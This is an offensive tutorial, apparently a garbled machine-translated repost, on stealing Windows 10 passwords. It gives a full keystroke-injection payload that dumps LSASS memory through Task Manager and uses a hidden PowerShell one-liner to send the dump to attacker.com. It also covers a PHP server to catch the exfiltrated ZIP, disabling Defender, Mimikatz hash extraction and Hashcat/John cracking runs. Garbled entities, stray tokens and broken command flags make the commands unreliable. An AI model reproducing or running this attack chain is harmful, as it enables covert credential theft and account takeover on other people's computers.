Windows 10 passwords stored as NTLM hashes (or, more specifically, NT hashes) can be dumped within a few seconds and filtered to an attacker's system. The hashes can easily be brutally forced and cracked to reveal the passwords in plain text using a combination of tools, including Mimikatz, ProcDump, John the Ripper and Hashcat.
Let us first discuss the Local Security Authority Subsystem Service, or LSASS, an essential part of the Windows operating system.
LSASS is responsible for authoritative domain authentication, Active Directory management and security policy enforcement. It generates the processes that are responsible for authenticating users with NTML and verifies the validity of logins. Because it is so crucial to the functionality of the operating system, hackers will often rename malicious executables after the process.
Mimikatz & ProcDump
Mimikatz, made by gentilkiwi, can be used to extract password hashes, Kerberos tickets and pin codes from the Windows 1
Today, Windows Defender and antivirus software have become increasingly effective at detecting Mimikatz versions and signatures (shown below).
In combination with Mimikatz, hackers now use ProcDump, a standalone executable file designed for administrators to monitor application crashes.
ProcDump is used to extract the LSASS dump, which is later moved to an offline Windows 10 computer and is analyzed with Mimikatz. This is still an effective technique for extracting credentials from Windows 10 because ProcDump is a signed Microsoft binary file and is not flagged by most antivirus software (shown below).
Windows 10 Task Manager can also be used to dump LSASS memory without the help of Mimikatz or ProcDump. Below is an example of a Mousejack payload designed to extract and filter out the LSASS dump with only keystroke injections and PowerShell. The attack is complete within ten seconds (it is delayed at certain points for interpretation).
The Task Manager is opened in the Run with administrative rights window. The screen goes completely dark for a second due to the User Access Control (UAC) prompt, preventing the GIF maker from recording the screen. Next, the local security instance process (lsass.exe) is in the process list and is dumped to the% TEMP% folder (default). A PowerShell liner is then fully executed from the run window. It compresses the LSASS dump into a ZIP file and sends it to the attacker's server.
At this time, the attacker can use Mimikatz in an offline Windows 10 computer or virtual machine (on which no antivirus software is installed) to extract hashed passwords.
Step 1: Make the Keystroke Injection Payload
The keystroke injection payload below can be invoked with Mousejack vulnerabilities or a USB Rubber Ducky.
While MouseJack vulnerabilities were disclosed a few years ago, tens of millions of keyboards and mice (including Logitech devices) are still suspected of keystroke injection . As Marcus Mengs, creator of P4wnP1 illustrates in his proof of concept video, Logitech dongles are still vulnerable to remote attacks .
Comments ( REM ) added to each line in the payload for clarification.
REM 2.5 seconds delay to give Windows 10 some time to correct REM mount the USB Rubber Ducky. This initial delay is not REM required for Mousejack attacks. DELAY 2500 REM Open the run command window. GUI r REM Let the run command window open for 1 second. DELAY 1000 REM Type "taskmgr" (i.e. Task Manager) in the execution window. STRING taskmgr REM delay for 0.5 seconds. DELAY 500 REM Ctrl + Shift + Enter keyboard combination is pressed to recall REM the User Account Control (UAC) window. This will cause REM taskmgr to open with administrator rights. CTRL + SHIFT ENTER REM Display the UAC window. This may take a few seconds REM on some Windows 10 machines. DELAY 2500 REM ALT + y keyboard combination to accept and bypass the UAC REM prompt. ALT y REM Wait a few seconds until Task Manager is fully opened with REM administrator rights. This took (on average) 5.5 seconds in my REM tests. In some scenarios & # 39; s, with high-end CPU & # 39; s, this delay REM can be considerably lower. DELAY 5500 REM Press the keyboard to move from the toolbar to the REM list of active background processes. DOWN REM Type "local" to jump down and highlight the "Local Protection" REM Authority Service "processes. STRING locally REM SHIFT + F10 keyboard combination invokes the right-click options REM menu. SHIFT F10 REM Allow 1.2 seconds to fully open the options menu. DELAY 1200 REM Press the keyboard four times to highlight "Create" REM dump file "option. DOWN DOWN DOWN DOWN REM Press Enter to select the "Create Dump File" option. ENTER REM Wait 3.5 seconds to create and save the dump file REM to the% TEMP% folder. DELAY 3500 REM Press Enter to select "OK" and close the dump pop-up window. ENTER REM ALT + F4 combination to close the Task Manager window. ALT F4 REM Wait 7 seconds to close Task Manager. DELAY 700 REM Reopen the run command window. GUI r REM Wait .7 seconds to open the run window. DELAY 700 REM PowerShell single liner to compress and exfiltrate the LSASS REM dump file. Each part of the lining is explained in more detail REM detail below. STRING powershell -ep bypass / w 1 / C $ t = $ env: temp; $ 1 = & # 39; lsass.DMP & # 39 ;; compress-archive-path $ t $ l-destination path $ t a.zip; iwr attacker.com /i.php method POST file $ t a.zip REM Press Enter to execute the PowerShell liner. ENTER
The PowerShell payload consists of various commands that are linked to each other by semicolons & # 39; s:
- powershell -ep bypass / w 1 / C – The ExecutionPolicy (-ep) is set to " bypass "to enable PowerShell execution via Windows Defender and some antivirus software. The WindowStyle (/ w) is set to "1", which immediately hides the PowerShell pop-up terminal.
- $ t = $ env: temp; – The temporary folder of the target is set to the variable $ t. The variable use of one letter helps to shorten the total length of the load; It is more effective than typing "C: Users % USERNAME% AppData Local Temp" over and over.
- $ 1 = & # 39; lsass.DMP & # 39 ;; – The file name lsass.DMP is set to the variable $ l. This file name is automatically defined by the Task Manager.
- compress-archive -path $ t $ 1 -destinationpath $ t a.zip; – PowerShell & # 39; s Compress-Archive cmdlet is used to zip the lsass.DMP in the "a.zip" (-destinationpath) file.
- iwr attacker.com/i.php -method POST -infile $ t a.zip – Invoke Webrequest (iwr) sends the a.zip (-infile) to the attacker's server in the form of a POST request. Be sure to change "attacker.com" to the local IP address of Kali or the virtual private server address.
Before you perform a keystroke injection, a PHP server is required to intercept the exfiltration of the dump.
The keystroke payload expects a server on port 80. For simplicity, this example uses Kali Linux on a local network, so root rights are already in use. However, setting up on a virtual private server requires root to open a listening service on port 80.
Non-Kali users can start with the following command:
~ $ sudo su
Then create a folder named "phpServer /" using the command below mkdir .
~ $ mkdir phpServer /
Go to the phpServer / folder with the command cd .
~ $ cd phpServer /
Create a file named "i.php" with nano .
~ $ nano i.php
Paste the PHP script below into the nano terminal. When that is done, press Ctrl + x then y and then and then . Enter .
to store and leave the nanoterminal.
This simple PHP script can intercept ZIP files and does not need to be modified in any way to function. When the Windows 10 target computer sends a .zip, this PHP server stores the data with the time as the file name.
Start the PHP server with the command php -S 0.0.0.0:80 cialis19459026]. The -S tells PHP to start a web server, while 0.0.0.0 says it should host the server on every IPv4 interface.
~ $ php -S 0.0.0.0: 80 PHP 7.3.0-2 Development Server started Listen at http://0.0.0.0:80 Document root is / root / phpServer Press Ctrl-C to stop.
Step 3: Unpack the hash with Mimikatz
After the ZIP is intercepted, move it to a Windows 10 computer or virtual machine. Extract it to find the lsass.DMP file.
Be sure to disable Windows Defender and other security features before you download Mimikatz. Open the Start menu and search for "virus".
Click on "Virus and threat protection settings" and disable all available options. Alternatively, a virtual machine without Windows Defender or Smartscreen can be installed for Mimikatz antics.
At the time of this writing, the latest version of Mimikatz 2.2.0, Carlos -update. Open a web browser and navigate to the GitHub repository to find the latest "mimikatz_trunk.zip" version.
After unpacking the Mimikatz ZIP, open a PowerShell terminal. Use the following command to run mimikatz.exe and the mimikatz prompt appears.
C: > PS & "C: Users $ env: username PATH TO MIMIKATZ x64 mimikatz.exe" . #####. mimikatz 2.2.0 (x64) # 18362 August 13, 2019 1:35:04 . ## ^ ##. "A La Vie, A L & # 39; Amour" - (oe.eo) ## / ## / *** Benjamin DELPY `gentilkiwi` (email@example.com) ## / ##> http://blog.gentilkiwi.com/mimikatz & # 39; ## v ## & # 39; Vincent LE TOUX (firstname.lastname@example.org) & # 39; ##### & # 39;> http://pingcastle.com / http://mysmartlogon.com *** / mimikatz #
The following sekurlsa :: minidump command loads the lsass.DMP into Mimikatz.
mimikatz # sekurlsa :: minidump C: Users % USERNAME% Documents lsass.DMP Switch to MINIDUMP: & # 39; C: Users tokyoneon Documents lsass.DMP & # 39;
Then use the command sekurlsa :: logonPasswords to extract hash references. Since Windows 8, passwords without formatting are no longer stored in memory without further changing the operating system. But that doesn't mean that Windows 10 hashes can be brutally forced and easily cracked. In line 12 we find the hash password in NTLM format.
mimikatz # sekurlsa :: logonPasswords Opening: file & # 39; C: Users tokyoneon Documents lsass.DMP & # 39; for mini dump ... 1 Verification ID: 0; 102597 (00000000: 000190c5) 2 session: interactive from 1 3 Username: tokyoneon 4 Domain: MSEDGEWIN10 5 Login server: MSEDGEWIN10 6 Registration time: 5/31/2019 1:01:05 AM 7 SID: S-1-5-21-3859058339-3768143778-240673529-1000 8 msv: 9  Primary 10 * Username: tokyoneon 11 * Domain: MSEDGEWIN10 12 * NTLM: 7b5e40a5b7b17972ad793b9fc868a66e 13 * SHA1: 6076b8f4d982b55097f910b3fb5a81c801954406 14 teaspoon: 15 most digital: 16 * Username: tokyoneon 17 * Domain: MSEDGEWIN10 18 * Password: (null) 19 kerberos: 20 * Username: tokyoneon 21 * Domain: MSEDGEWIN10 22 * Password: (null) 23 ssp: 24 credman: Verification ID: 0; 102306 (00000000: 00018fa2) 26 session: interactive from 1 27 Username: tokyoneon 28 Domain: MSEDGEWIN10 29 Logon server: MSEDGEWIN10 30 Registration time: 5/31/2019 1:01:05 AM 31 SID: S-1-5-21-3859058339-3768143778-240673529-1000 32 msv: 33  Primary 34 * Username: tokyoneon 35 * Domain: MSEDGEWIN10 36 * NTLM: 7b5e40a5b7b17972ad793b9fc868a66e 37 * SHA1: 6076b8f4d982b55097f910b3fb5a81c801954406 38 tspkg: 39 wdigest: 40 * Username: tokyoneon 41 * Domain: MSEDGEWIN10 42 * Password: (null) 43 kerberos: 44 * Username: tokyoneon 45 * Domain: MSEDGEWIN10 46 * Password: (null) 47 ssp: 48 credman: 49 Verification ID: 0; 74052 (00000000: 00012144) 50 session: service from 0 51 Username: sshd_server 52 Domain: MSEDGEWIN10 53 Login server: MSEDGEWIN10 54 Application time: 5/31/2019 1:01:04 AM 55 SID: S-1-5-21-3859058339-3768143778-240673529-1003 56 msv: 57  Primary 58 * Username: sshd_server 59 * Domain: MSEDGEWIN10 60 * NTLM: 8d0a16cfc061c3359db455d00ec27035 61 * SHA1: 94bd2df8ae5cadbbb5757c3be01dd40c27f9362f 62 tspkg: 63 widest: 64 * Username: sshd_server 65 * Domain: MSEDGEWIN10 66 * Password: (null) 67 kerberos: 68 * Username: sshd_server 69 * Domain: MSEDGEWIN10 70 * Password: (null) 71 ssp: 72 credman: mimikatz #
Step 4: Brute-Forcing the NTLM Hash
As a small experiment, I wanted to know how long it would take for a Raspberry Pi 3B +, common Intel i7 CPU, and GeForce GTX GPU to crack the same hash consisting of six random characters and ending with two random numbers (e.g., Nchfyr56 ).
1. Brute-Force with Raspberry Pi 3B + (John the Ripper)
After installing John the Ripper on a Raspberry Pi 3B +, the password (nchfyr56) was guessed in just over five hours. Since most passwords are eight characters long, mask attacks with a Raspberry Pi are surprisingly practical for brute-forcing NTLM hashes.
Available on Amazon: CanaKit Raspberry Pi 3B + with power supply
~ $ john -mask =? l? l? l? l? l? l? d? d --format = NT / root / Desktop / hash Use standard input coding: UTF-8 1 password hash (NT [MD4 32/32]) loaded Warning: no OpenMP support for this hash type, consider --fork = 4 Press & # 39; q & # 39; or Ctrl-C to abort, on almost any other key for the status nchfyr56 (?) 1g 0: 05: 19: 24 DONE (2018-06-22 16:36) 0.000052g / s 1389Kp / s 1389Kc / s 1389KC / s achfyr56..zuhfyr56 Use the "--show --format = NT" options to reliably display all cracked passwords Session completed
2. Brute-Force with Intel i7 CPU (Hashcat CPU)
The same NTLM hash only took three minutes to crack with an old Intel i7, but it took an estimated fifteen minutes to complete the full keyspace.
~ $ hashcat / tmp / hash -m 1000 -a3? l? l? l? l? l? l? d? d hashcat (v5.1.0) from ... OpenCL Platform # 1: The pocl project =========================================== * Device # 1: pthread-Intel (R) Core (TM) i7-3537U CPU @ 2.00GHz, assignable 2048/5809 MB, 4MCU 7b5e40a5b7b17972ad793b9fc868a66e: nchfyr56 Session ..........: hashcat Status ...........: cracked Hash.Type ........: NTLM Hash.Target ......: 7b5e40a5b7b17972ad793b9fc868a66e Time.Started .....: Fri 31 Aug 21:48:25 2019 (2 minutes, 50 sec) Time: estimated ...: Fri, 31 Aug 21:51:15 2019 (0 sec) Guess.Mask .......:? L? L? L? L? L? L? D? D  Guess.Queue ......: 1/1 (100.00%) Speed # 1 .........: 35719.8 kH / s (7.23ms) @ Accel: 512 Loops: 128 Thr: 1 Vec: 8 Recovered ........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts Progress .........: 6049366016/30891577600 (19.58%) Declined .........: 0/6049366016 (0.00%) Restore.Point ....: 344064/1757600 (19.58%) Restore Sub # 1 ...: Salt: 0 Amplifier: 896-1024 Iteration: 0-128 Candidates. # 1 ....: hstrxp56 -> tjoqxn56 Started: Fri 31 August 21:48:09 2019 Stopped: Fri 31 August 21:51:16 2019
3. Brute-Force with GeForce GTX GPU (Hashcat GPU)
The NTLM hash was cracked within a second. This was achieved with a fairly low end GeForce GTX 1060 GPU.
~ $ hashcat / tmp / hash -m 1000 -a3? L? L? L? L? L? D? D OpenCL Platform # 1: NVIDIA Corporation ============================================= * Device # 1: GeForce GTX 1060 3 GB, 754/3018 MB assignable, 9MCU 7b5e40a5b7b17972ad793b9fc868a66e: nchfyr56 Session ..........: hashcat Status ...........: cracked Hash.Type ........: NTLM Hash.Target ......: 7b5e40a5b7b17972ad793b9fc868a66e Time.Started .....: Fri 31 Aug 03:00:38 2019 (0 sec) Time. Estimated ...: Fri August 31 3:00:38 2019 (0 sec) Guess.Mask .......:? L? L? L? L? L? L? D? D  Guess.Queue ......: 1/1 (100.00%) Speed # 1 .........: 4658.0 MH / s (7.06ms) @ Accel: 128 Loops: 32 Thr: 1024 Vec: 1 Recovered ........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts Progress .........: 1094713344/30891577600 (3.54%) Declined .........: 0/1094713344 (0.00%) Restore.Point ....: 0/1757600 (0.00%) Restore. # 1 ...: Salt: 0 Amplifier: 896-928 Iteration: 0-32 Candidates. # 1 ....: hstera12 -> eusind80 Hardware.Mon. # 1 ..: Temp: 34c Fan: 25% Util: 92% Core: 1898MHz Mem: 3802MHz Bus: 16 Started: Fri 31 August 03:00:34 2019 Stopped: Fri August 31 03:00:39 2019
When testing stronger eight-character and two-digit passwords (for example Psjhfhdd48) against the GPU, the hash was cracked within twenty-five minutes.
~ $ hashcat / tmp / hash2 -w4 -O -m 1000 -a3? you? l? l? l? l? l? l? l? d? d OpenCL Platform # 1: NVIDIA Corporation ============================================= * Device # 1: GeForce GTX 1060 3 GB, 754/3018 MB assignable, 9MCU 30346ad7463810ea4d5a58090611e368: Psjhfhdd48 Session ..........: hashcat Status ...........: cracked Hash.Type ........: NTLM Hash.Target ......: 30346ad7463810ea4d5a58090611e368 Time.Started .....: Fri 31 Aug 03:19:11 2019 (23 minutes, 28 sec) Time: estimated ...: Fri 31 Aug 03:42:39 2019 (0 sec) Guess.Mask .......:? YOU? L? L? L? L? L? L? L? D? D  Guess.Queue ......: 1/1 (100.00%) Speed # 1 .........: 12459.0 MH / s (97.89ms) @ Accel: 256 Loops: 676 Thr: 1024 Vec: 1 Recovered ........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts Progress .........: 17567648317440/20882706457600 (84.13%) Declined .........: 0/17567648317440 (0.00%) Restore.Point ....: 25985286144/30891577600 (84.12%) Restore Sub # 1 ...: Salt: 0 Amplifier: 0-676 Iteration: 0-676 Candidates. # 1 ....: Mackuobd48 -> Xzkmatgd48 Hardware.Mon. # 1 ..: Temp: 73c Fan: 50% Util: 100% Core: 1835MHz Mem: 3802MHz Bus: 16 Started: Fri 31 August 03:19:09 2019 Stopped: Fri August 31 03:42:40 2019
Even greater integrity (eight characters + four digits) NTLM hashes needed an estimated two days to crack.
~ $ hashcat / tmp / hash3 -w4 - O -m 1000 -a3? YOU? L? L? L? L? L? L? L? D? D? D? D Session ..........: hashcat Status ...........: Active Hash.Type ........: NTLM Hash.Target ......: aa110854b242ed77c07be54e62611464 Time.Started .....: Fri 31 Aug 03:43:40 2019 (45 sec) Time. Estimated ...: Sun 2 September 01:48:09 2019 (1 day, 22 hours) Guess.Mask .......:? YOU? L? L? L? L? L? L? L? D? D? D? D  Guess.Queue ......: 1/1 (100.00%) Speed # 1 .........: 12589.8 MH / s (96.68ms) @ Accel: 256 Loops: 676 Thr: 1024 Vec: 1 Recovered ........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts Progress .........: 559804317696/2088270645760000 (0.03%) Declined .........: 0/559804317696 (0.00%) Restore.Point ....: 828112896/3089157760000 (0.03%) Restore Sub # 1 ...: Salt: 0 Amplifier: 0-676 Iteration: 0-676 Candidates. # 1 ....: Maecdesr2000 -> Xzoejixr2000 Hardware.Mon. # 1 ..: Temp: 65c Fan: 38% Util: 100% Core: 1847MHz Mem: 3802MHz Bus: 16 [s] tatus [p] ause [b] ypass [c] heckpoint [q] from =>
For hackers with special brute-force machines, two days is very realistic. With a cluster of superior GPUs, an attacker can easily crack any hash that is derived from a wider keyspace.
Follow me until next time on Twitter @tokyoneon_ and GitHub. And as always, leave a comment below or send me a message if you have any questions.
Don't miss it: Getting started hacking Windows 10